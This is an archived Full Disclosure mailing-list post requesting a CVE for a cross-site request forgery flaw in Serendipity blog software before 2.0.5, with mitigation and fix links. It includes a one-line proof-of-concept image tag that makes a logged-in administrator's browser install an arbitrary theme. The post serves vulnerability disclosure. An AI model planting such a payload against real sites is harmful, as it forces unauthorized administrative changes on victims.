lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <PS1PR04MB1001657799C63D9A531379B1DF0E0@PS1PR04MB1001.apcprd04.prod.outlook.com> Date: Sun, 9 Apr 2017 10:17:46 +0000 From: Wester 95 <evilzyzeng@...look.com> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] CVE Request:CSRF in Serendipity allows attacker installs any themes Hi team, I would like to request one CVE id, thank you! Details ====== Software: s9y Serendipity Version: <2.0.5 Homepage: https://docs.s9y.org/ ======= Description ================ Get type CSRF in Serendipity allows attacker installs any themes, no token here. POC: ======== include this in the page ,then attack will occur: <img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartleby”> Mitigations ======= update to Serendipity v2.1.x ======== FIX: ========== https://github.com/s9y/Serendipity/issues/452 Best regards, Zhiyang Zeng of Tencent security platform department _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists